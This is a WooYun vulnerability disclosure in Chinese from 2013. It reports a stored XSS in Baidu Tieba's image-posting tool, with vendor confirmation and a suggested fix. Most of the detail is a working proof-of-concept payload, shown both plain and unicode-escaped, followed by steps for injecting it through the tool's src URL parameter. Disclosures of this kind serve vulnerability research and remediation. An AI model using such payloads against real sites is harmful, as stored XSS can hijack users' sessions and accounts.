漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-026849
漏洞标题:百度贴吧存储型XSS漏洞,可劫持用户身份认证信息。
相关厂商:百度
漏洞作者: q601333824
提交时间:2013-06-25 13:05
修复时间:2013-08-09 13:06
公开时间:2013-08-09 13:06
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-06-25: 细节已通知厂商并且等待厂商处理中
2013-06-25: 厂商已经确认,细节仅向厂商公开
2013-07-05: 细节向核心白帽子及相关领域专家公开
2013-07-15: 细节向普通白帽子公开
2013-07-25: 细节向实习白帽子公开
2013-08-09: 细节向公众公开
简要描述:
贴图神器上传存在XSS漏洞
详细说明:
1.先构造代码: "><img class="BDE_Smiley" src="http://static.tieba.baidu.com/tb/editor/images/face/i_f01.png" pic_ext="png" width="30" height="30" onload="alert(1)"><img src="#" pic_ext="jpeg" onerror="$(".pic_src_wrapper").css("display","none")"><a
2.然后进行转码: \u0022\u003e\u003c\u0069\u006d\u0067\u0020\u0063\u006c\u0061\u0073\u0073\u003d\u0022\u0042\u0044\u0045\u005f\u0053\u006d\u0069\u006c\u0065\u0079\u0022\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0073\u0074\u0061\u0074\u0069\u0063\u002e\u0074\u0069\u0065\u0062\u0061\u002e\u0062\u0061\u0069\u0064\u0075\u002e\u0063\u006f\u006d\u002f\u0074\u0062\u002f\u0065\u0064\u0069\u0074\u006f\u0072\u002f\u0069\u006d\u0061\u0067\u0065\u0073\u002f\u0066\u0061\u0063\u0065\u002f\u0069\u005f\u0066\u0030\u0031\u002e\u0070\u006e\u0067\u0022\u0020\u0070\u0069\u0063\u005f\u0065\u0078\u0074\u003d\u0022\u0070\u006e\u0067\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0033\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0033\u0030\u0022\u0020\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u0022\u003e\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0023\u0022\u0020\u0070\u0069\u0063\u005f\u0065\u0078\u0074\u003d\u0022\u006a\u0070\u0065\u0067\u0022\u0020\u006f\u006e\u0065\u0072\u0072\u006f\u0072\u003d\u0022\u0024\u0028\u0026\u0071\u0075\u006f\u0074\u003b\u002e\u0070\u0069\u0063\u005f\u0073\u0072\u0063\u005f\u0077\u0072\u0061\u0070\u0070\u0065\u0072\u0026\u0071\u0075\u006f\u0074\u003b\u0029\u002e\u0063\u0073\u0073\u0028\u0026\u0071\u0075\u006f\u0074\u003b\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0026\u0071\u0075\u006f\u0074\u003b\u002c\u0026\u0071\u0075\u006f\u0074\u003b\u006e\u006f\u006e\u0065\u0026\u0071\u0075\u006f\u0074\u003b\u0029\u0022\u003e\u003c\u0061
3.http://tieba.baidu.com/photo/shenqi?title=&src=http%3A%2F%2Fwww.baidu.com%2Fp%2F%25E5%258D%2596%25E8%2590%258C%25E7%259A%2584%25E4%25B8%25AD%25E4%25BA%258C%3Ffrom%3Dsuper&pic[0]=http%3A%2F%2Fhimg.bdimg.com%2Fsys%2Fportrait%2Fitem%2Fc22ce58d96e8908ce79a84e4b8ade4ba8c0334.jpg
(这个是贴吧神器地址)
4.讲构造好的代码放入&src=连接的后面
5.得到
http://tieba.baidu.com/photo/shenqi?title=&src=http%3A%2F%2Fwww.baidu.com%2Fp%2F%25E5%258D%2596%25E8%2590%258C%25E7%259A%2584%25E4%25B8%25AD%25E4%25BA%258C%3Ffrom%3Dsuper\u0022\u003e\u003c\u0069\u006d\u0067\u0020\u0063\u006c\u0061\u0073\u0073\u003d\u0022\u0042\u0044\u0045\u005f\u0053\u006d\u0069\u006c\u0065\u0079\u0022\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0073\u0074\u0061\u0074\u0069\u0063\u002e\u0074\u0069\u0065\u0062\u0061\u002e\u0062\u0061\u0069\u0064\u0075\u002e\u0063\u006f\u006d\u002f\u0074\u0062\u002f\u0065\u0064\u0069\u0074\u006f\u0072\u002f\u0069\u006d\u0061\u0067\u0065\u0073\u002f\u0066\u0061\u0063\u0065\u002f\u0069\u005f\u0066\u0030\u0031\u002e\u0070\u006e\u0067\u0022\u0020\u0070\u0069\u0063\u005f\u0065\u0078\u0074\u003d\u0022\u0070\u006e\u0067\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0033\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0033\u0030\u0022\u0020\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u0022\u003e\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0023\u0022\u0020\u0070\u0069\u0063\u005f\u0065\u0078\u0074\u003d\u0022\u006a\u0070\u0065\u0067\u0022\u0020\u006f\u006e\u0065\u0072\u0072\u006f\u0072\u003d\u0022\u0024\u0028\u0026\u0071\u0075\u006f\u0074\u003b\u002e\u0070\u0069\u0063\u005f\u0073\u0072\u0063\u005f\u0077\u0072\u0061\u0070\u0070\u0065\u0072\u0026\u0071\u0075\u006f\u0074\u003b\u0029\u002e\u0063\u0073\u0073\u0028\u0026\u0071\u0075\u006f\u0074\u003b\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0026\u0071\u0075\u006f\u0074\u003b\u002c\u0026\u0071\u0075\u006f\u0074\u003b\u006e\u006f\u006e\u0065\u0026\u0071\u0075\u006f\u0074\u003b\u0029\u0022\u003e\u003c\u0061
&pic[0]=http%3A%2F%2Fhimg.bdimg.com%2Fsys%2Fportrait%2Fitem%2Fc22ce58d96e8908ce79a84e4b8ade4ba8c0334.jpg
6.然后回复或者发布主题,可以产生XSS
漏洞证明:
修复方案:
过滤符号"\"(能给个邀请码吗)
版权声明:转载请注明来源 q601333824@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:1
确认时间:2013-06-25 13:52
厂商回复:
感谢提交,该漏洞我们已内部监控发现,正在处理中。再次感谢您的反馈。
最新状态:
暂无